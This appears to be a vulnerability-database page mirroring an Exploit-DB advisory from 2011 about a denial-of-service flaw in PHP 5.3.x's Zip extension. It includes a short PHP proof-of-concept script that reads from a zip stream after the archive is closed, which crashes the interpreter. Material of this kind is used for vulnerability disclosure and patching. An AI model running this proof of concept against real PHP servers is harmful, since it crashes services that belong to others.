Lucene search

K

PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Denial of Service

🗓️ 10 Mar 2011 00:00:00Reported by paulgaoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 65 Views

PHP 5.3.x 'Zip' Extension Denial of Service vulnerabilit

Show more
Related
Code
source: https://www.securityfocus.com/bid/46969/info

PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension.

Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.

Versions prior to PHP 5.3.6 are vulnerable. 

<?php

$target_file = 'META-INF/MANIFEST.MF';

$za = new ZipArchive();
if ($za->open('test.jar') !== TRUE)
{
    return FALSE;
}

if ($za->statName($target_file) !== FALSE)
{
    $fd = $za->getStream($target_file);
}
else
{
    $fd = FALSE;
}
$za->close();

if (is_resource($fd))
{
    echo strlen(stream_get_contents($fd));
}

?>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Mar 2011 00:00Current
7.4High risk
Vulners AI Score7.4
65
.json
Report